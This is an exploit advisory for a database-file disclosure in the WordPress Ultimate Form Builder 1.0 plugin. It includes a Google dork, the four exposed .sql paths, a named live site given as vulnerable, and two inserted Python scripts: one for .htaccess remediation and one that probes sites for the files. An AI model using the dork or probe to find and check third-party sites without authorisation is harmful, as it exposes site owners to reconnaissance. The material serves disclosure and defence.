KingSkrupellos

WordPress Ultimate Form Builder 1.0 Database Disclosure

Mar 28th, 2019
############################################################################################

# Exploit Title : WordPress Ultimate Form Builder Plugin 1.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/03/2019
# Vendor Homepage : access-keys.com
# Software Information Links :
codecanyon.net/item/ultimate-form-builder/14644208
accesspressthemes.com/wordpress-plugins/ultimate-form-builder/
access-keys.com/documentation/ultimate-form-builder-lite/
# Software Version : WordPress 4.x and 5.x - Plugin Version 1.0
# Software Price : Paid Download - $32
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : filetype:sql inurl:/wp-content/plugins/ultimate-form-builder/
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about the phpMyAdmin SQL dump finding =>
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Reference Links : cxsecurity.com/issue/WLB-2019030236
packetstormsecurity.com/files/152284/WordPress-Ultimate-Form-Builder-1.0-Database-Disclosure.html

############################################################################################

# Description about Software :
***************************
Ultimate Form Builder is a PREMIUM WordPress plugin which allows you to create unlimited responsive forms
(single step or multi-step). Any type of form (Contact us, Opt-in, Call-to-Action, Survey, Quotation, Enquiry or anything else)
can be built using the drag and drop form builder. Using this plugin is easy because you can create, customize
and build forms, apply existing form templates for design and use them on your WP site in no time.

You can receive form submission data via email and store it in the database, from where it can be exported
to CSV via the plugin's backend.

############################################################################################

# Impact :
***********
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized
to have access to that information.

* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web.
It can be used to dump a database or a collection of databases for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both. The files listed below are phpMyAdmin SQL dumps
that the plugin ships inside its own directory under the web root, so any unauthenticated visitor can download them.

* What the dump header does and does not reveal: "Host", "Server version" and "PHP Version" are whatever phpMyAdmin recorded on the
machine where the export was made. For files bundled with a plugin that is the developer's environment (hence "Host: localhost"),
so these values do not fingerprint the target server's MySQL or PHP. Judging by their names, the files hold the plugin's
country/state/city lookup tables and their schema rather than a dump of the site's own database; they still confirm to an
attacker that the plugin is installed, and SQL dump files of any kind should not be reachable on a production system.

Remediation : Restrict web access to these files or remove them from the web root.

############################################################################################

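One way to carry out that remediation on a local install, as an added example (this is not code from the advisory or from the plugin): walk wp-content/plugins for .sql files, mark the ones carrying the phpMyAdmin export banner, and drop an Apache .htaccess into every directory that holds one, denying *.sql over HTTP. It assumes Apache with AllowOverride in effect for the plugins directory (nginx ignores .htaccess; the equivalent there is a `location ~ \.sql$ { deny all; }` block in the server config). The sample tree, file contents and file names inside `demo()` are constructed from the paths and header the advisory quotes.

```python
import pathlib
import re
import tempfile

# Banner every phpMyAdmin export starts with (the advisory quotes it verbatim).
DUMP_BANNER = re.compile(rb"^--\s*phpMyAdmin SQL Dump", re.M)

# Apache rule: refuse to serve any *.sql file from the directory holding this .htaccess.
# PHP can still open the files from disk if the plugin needs them; only HTTP access is cut off.
HTACCESS_RULE = (
    "# Never serve SQL dump files to browsers (added by the audit script)\n"
    '<FilesMatch "\\.sql$">\n'
    "    Require all denied\n"
    "</FilesMatch>\n"
)

# Constructed sample: the header the advisory quotes, plus one throw-away statement.
SAMPLE_DUMP = b"""-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10

CREATE TABLE IF NOT EXISTS `states` (`id` int(11) NOT NULL, `name` varchar(64) NOT NULL);
"""

# The four files the advisory lists.
ADVISORY_FILES = ("cities.sql", "countries.sql", "db_country_state_city.sql", "states.sql")


def find_sql_files(wp_root):
    """Web-relative paths (sorted) of every .sql file under wp-content/plugins."""
    root = pathlib.Path(wp_root)
    plugins = root / "wp-content" / "plugins"
    return sorted("/" + p.relative_to(root).as_posix() for p in plugins.rglob("*.sql"))


def is_phpmyadmin_dump(path):
    """True when the first 512 bytes carry the phpMyAdmin export banner."""
    with open(path, "rb") as fh:
        return bool(DUMP_BANNER.search(fh.read(512)))


def protect_directory(directory):
    """Write or extend .htaccess so Apache denies *.sql here. Returns True if a rule was added."""
    htaccess = pathlib.Path(directory) / ".htaccess"
    existing = htaccess.read_text() if htaccess.exists() else ""
    if "FilesMatch" in existing and ".sql" in existing:
        return False  # already protected; keeps repeated runs idempotent
    sep = "" if not existing or existing.endswith("\n") else "\n"
    htaccess.write_text(existing + sep + HTACCESS_RULE)
    return True


def audit_and_protect(wp_root):
    """Report every web-reachable .sql file, mark the phpMyAdmin dumps, fence off their directories."""
    root = pathlib.Path(wp_root)
    sql_files = find_sql_files(wp_root)
    dumps = [p for p in sql_files if is_phpmyadmin_dump(root / p.lstrip("/"))]
    dirs = sorted({pathlib.PurePosixPath(p).parent.as_posix() for p in sql_files})
    for rel_dir in dirs:
        protect_directory(root / rel_dir.lstrip("/"))
    return {"sql_files": sql_files, "dumps": dumps, "protected_dirs": dirs}


def demo():
    """Build a throw-away WordPress tree holding the advisory's four files and audit it twice."""
    with tempfile.TemporaryDirectory() as tmp:
        tables = pathlib.Path(tmp) / "wp-content" / "plugins" / "ultimate-form-builder" / "tables"
        tables.mkdir(parents=True)
        for name in ADVISORY_FILES:
            (tables / name).write_bytes(SAMPLE_DUMP)
        # A hand-written schema file: still served as *.sql, but not a phpMyAdmin export.
        (tables / "schema.sql").write_bytes(b"-- plain schema, no phpMyAdmin banner\n")
        first = audit_and_protect(tmp)
        second = audit_and_protect(tmp)
        rule_count = (tables / ".htaccess").read_text().count("<FilesMatch")
        return {**first, "second_run_same": second == first, "rules_written": rule_count}


if __name__ == "__main__":
    import sys
    print(audit_and_protect(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

The .htaccess route is chosen over deleting the files because the advisory does not say whether the plugin reads them from disk at activation time; a FilesMatch deny only blocks HTTP, so PHP-side reads keep working. If you confirm the plugin never needs them, moving the tables directory outside the web root is the cleaner fix.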
# Database Disclosure Exploit :
****************************
The following files are served directly by the web server and can be requested without authentication:

/wp-content/plugins/ultimate-form-builder/tables/cities.sql
/wp-content/plugins/ultimate-form-builder/tables/countries.sql
/wp-content/plugins/ultimate-form-builder/tables/db_country_state_city.sql
/wp-content/plugins/ultimate-form-builder/tables/states.sql

Information :
***********
All four files begin with the same phpMyAdmin export header, which is what you would expect for data files
generated once by the plugin author and shipped with every copy of the plugin:

-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10

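A checker for the four paths above, as an added example (not code from the advisory): it requests each path, treats only a 200 whose body starts with the phpMyAdmin banner as a finding (a 200 carrying an HTML "not found" page is a soft 404, not an exposure), and pulls the header fields out so the report shows what was actually disclosed. The base URL `https://wordpress.example/` and the responses returned by `fake_fetch` are constructed for an offline run; `default_fetch` is what a real probe uses.

```python
import re
import urllib.error
import urllib.request

PLUGIN_DIR = "/wp-content/plugins/ultimate-form-builder/tables/"
DUMP_FILES = ("cities.sql", "countries.sql", "db_country_state_city.sql", "states.sql")

# phpMyAdmin export banner and the header fields quoted in the advisory.
BANNER = re.compile(r"^--\s*phpMyAdmin SQL Dump", re.M)
FIELD = re.compile(r"^--\s*(version|Host|Server version|PHP Version):?\s+(\S.*?)\s*$", re.M)


def parse_dump_header(body):
    """Header fields of a phpMyAdmin export as a dict, or None if this is not an export."""
    head = body[:1024]
    if not BANNER.search(head):
        return None
    return {key.lower(): value for key, value in FIELD.findall(head)}


def default_fetch(url, timeout=10):
    """GET url and return (status, first 4 KiB of body); HTTP errors become status codes."""
    req = urllib.request.Request(url, headers={"User-Agent": "sql-dump-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def check_site(base_url, fetch=default_fetch):
    """Probe the four paths; return {path: header_fields} for each one that serves a dump."""
    base = base_url.rstrip("/")
    exposed = {}
    for name in DUMP_FILES:
        path = PLUGIN_DIR + name
        status, body = fetch(base + path)
        if status != 200:
            continue
        fields = parse_dump_header(body)
        if fields is not None:  # a 200 carrying an HTML "not found" page is not a finding
            exposed[path] = fields
    return exposed


# --- constructed offline fixtures (not captured from any real site) ---
SAMPLE_DUMP = """-- phpMyAdmin SQL Dump
-- version 3.4.10.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.20
-- PHP Version: 5.3.10

CREATE TABLE IF NOT EXISTS `countries` (`id` int(11) NOT NULL, `name` varchar(64) NOT NULL);
"""
SOFT_404 = "<html><body><h1>Page not found</h1></body></html>"


def fake_fetch(url):
    """Stand-in for default_fetch: two files exposed, one soft 404, one real 404."""
    if url.endswith(("countries.sql", "states.sql")):
        return 200, SAMPLE_DUMP
    if url.endswith("cities.sql"):
        return 200, SOFT_404
    return 404, ""


def demo():
    return check_site("https://wordpress.example/", fetch=fake_fetch)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for path, fields in (check_site(target) if target else demo()).items():
        print(path, fields)
```

Run it as `python3 check.py https://site.example/` against a site you are authorised to test; with no argument it runs the offline demo. The extracted "host", "server version" and "php version" values belong to the machine that produced the export, so report them as properties of the bundled file, not of the target.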
############################################################################################

# Example Vulnerable Sites :
*************************
[+] ema-ic.it/wp-content/plugins/ultimate-form-builder/tables/states.sql

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################